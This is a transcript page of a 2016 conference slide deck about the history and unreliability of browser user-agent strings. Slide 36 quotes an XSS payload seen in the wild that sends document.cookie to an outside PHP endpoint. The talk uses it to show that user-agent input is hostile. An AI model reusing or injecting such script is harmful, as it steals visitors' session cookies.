Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Everybody Lies @ Fronteers Jam Sessions 2016

Everybody Lies @ Fronteers Jam Sessions 2016

This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on Github still shows millions of lines of code referring to user agents strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.

Niels Leenheer

October 06, 2016
Tweet

More Decks by Niels Leenheer

Other Decks in Technology

Transcript

  1. the 8 minute version that contains 

    none of that boring shit and just 

    the jokes and weird stuff
    everybody lies
    fronteers conference — jam sessions, october 6th 2016

    View Slide

  2. this talk is full of 

    lies and deception
    warning:

    View Slide

  3. View Slide

  4. yes…
    this talk is about
    browser sniffing

    View Slide

  5. why?

    View Slide

  6. browser sniffing is 

    dirty

    View Slide

  7. you should use 

    feature detection

    View Slide

  8. Dear Web Developers:
    Browser Sniffing is Stupid
    http:/
    /www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

    View Slide

  9. 5 Reasons Why Browser
    Sniffing Stinks
    https:/
    /www.sitepoint.com/why-browser-sniffing-stinks/

    View Slide

  10. everybody uses 

    browser sniffing

    View Slide

  11. View Slide

  12. why…
    is browser sniffing 

    so difficult?

    View Slide

  13. things started out simple

    View Slide

  14. Mosaic/0.9
    Mosaic

    View Slide

  15. Mozilla/1.0 (Win3.1)
    Netscape Navigator
    code name of 

    the browser

    View Slide

  16. but it quickly started 

    to get complicated

    View Slide

  17. Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
    Internet Explorer
    compatible with 

    Netscape Navigator 1.0

    View Slide

  18. Opera/10.00 (Windows NT 5.1; U; en) 

    Presto/2.2.0
    Opera

    View Slide

  19. Opera/9.8 (Windows NT 5.1; U; en) 

    Presto/2.2.0 Version/10.00
    Opera
    real version of

    the browser

    View Slide

  20. Mozilla/5.0 

    (Windows; U; Windows NT 6.0; en; rv:1.9.1) 

    Gecko/20090624 Firefox/3.5
    Firefox
    build date of

    the rendering engine

    View Slide

  21. Mozilla/5.0 (Windows NT 6.0; rv:2.0) 

    Gecko/20100101 Firefox/4.0
    Firefox
    build date is no 

    longer updated

    View Slide

  22. Mozilla/5.0 (Windows NT 6.0; rv:16.0) 

    Gecko/16.0 Firefox/16.0
    Firefox

    View Slide

  23. and it gets worse…

    View Slide

  24. Mozilla/5.0 

    (Macintosh; U; PPC Mac OS X 10_4_11; en)

    AppleWebKit/525.27.1 (KHTML, like Gecko)

    Version/3.2.3 Safari/525.28.3
    Safari

    View Slide

  25. Mozilla/5.0 

    (Windows; U; Windows NT 6.0; en)

    AppleWebKit/525.27.1 (KHTML, like Gecko)

    Chrome/15.0.874.120 Safari/525.28.3
    Chrome

    View Slide

  26. Mozilla/5.0 

    (Windows NT 10.0; WOW64) 

    AppleWebKit/537.36 (KHTML, like Gecko) 

    Chrome/44.0.2403.155 Safari/537.36 

    OPR/31.0.1889.180
    Opera

    View Slide

  27. Mozilla/5.0 

    (Windows NT 6.3; Trident/7.0; rv:11.0) 

    like Gecko
    Internet Explorer

    View Slide

  28. Mozilla/5.0 (Windows NT 10.0)

    AppleWebKit/537.36 (KHTML, like Gecko)

    Chrome/42.0.2311.135 Safari/525.28.3 

    Edge/12.10162
    Edge

    View Slide

  29. and those were all relatively
    normal user-agent strings

    View Slide

  30. sometimes browsers lie to 

    hide their true identity

    View Slide

  31. Opera/9.80 (X11; Linux zbov; U; en) 

    Presto/2.9.201 Version/11.50
    Opera

    View Slide

  32. Opera/9.80 (X11; Linux zbov; U; en) 

    Presto/2.9.201 Version/11.50
    Opera Mobile (desktop mode)
    ROT 13 encrypted

    “mobi“

    View Slide

  33. Mozilla/5.0 (compatible; MSIE 8.0; 

    Windows NT 6.1; Trident/5.0)
    Internet Explorer

    View Slide

  34. Mozilla/5.0 (compatible; MSIE 8.0; 

    Windows NT 6.1; Trident/5.0)
    Internet Explorer (compatibility view)
    Trident 5 means it’s 

    Internet Explorer 9

    View Slide

  35. and it is possible to change the
    user-agent string yourself

    View Slide

  36. alert("My Little Pony");
    document.location= 
<br/>"http://www.max1094.18.lc/admin/cookies.php?c=" + 
<br/>document.cookie;
    alt="My Little Pony">
    XSS attacks

    View Slide

  37. XSS attacks

    View Slide


  38. (╯°□°)╯︵ ┻━┻


    Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
    funny people

    View Slide

  39. angry people

    View Slide

  40. FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) 

    FuckYou/123.0 FuckingFox/321.0


    Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) 

    Presto/2.10.229 Version/11.62


    Seriously, Go fuck yourself


    W3C standards are important. 

    Stop fucking obsessing over user-agent already.
    angry people

    View Slide

  41. 1.000.000

    unique

    useragent
    strings

    View Slide

  42. 1.000.000

    unique

    useragent
    strings
    82 x fuck

    View Slide

  43. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    6 x ass

    View Slide

  44. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    6 x ass
    3 x vagina

    View Slide

  45. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    6 x ass
    3 x vagina
    108 x sex

    View Slide

  46. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    10 x shit
    6 x ass
    3 x vagina
    108 x sex

    View Slide

  47. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex

    View Slide

  48. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex
    4 x balls

    View Slide

  49. user-agent strings 

    cannot be trusted!

    View Slide

  50. everybody lies

    View Slide

  51. use browser sniffing for
    controlling access to 

    your website
    you should never

    View Slide

  52. you should never
    use browser sniffing for
    determining browser
    capabilities

    View Slide

  53. you should never
    build your own 

    browser sniffing library


    View Slide

  54. View Slide

  55. “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”
    — Ghandi

    View Slide

  56. “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”
    — Ghandi

    View Slide

  57. — Adolf Hitler
    “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”

    View Slide

  58. thank you!

    View Slide

  59. thank you!

    View Slide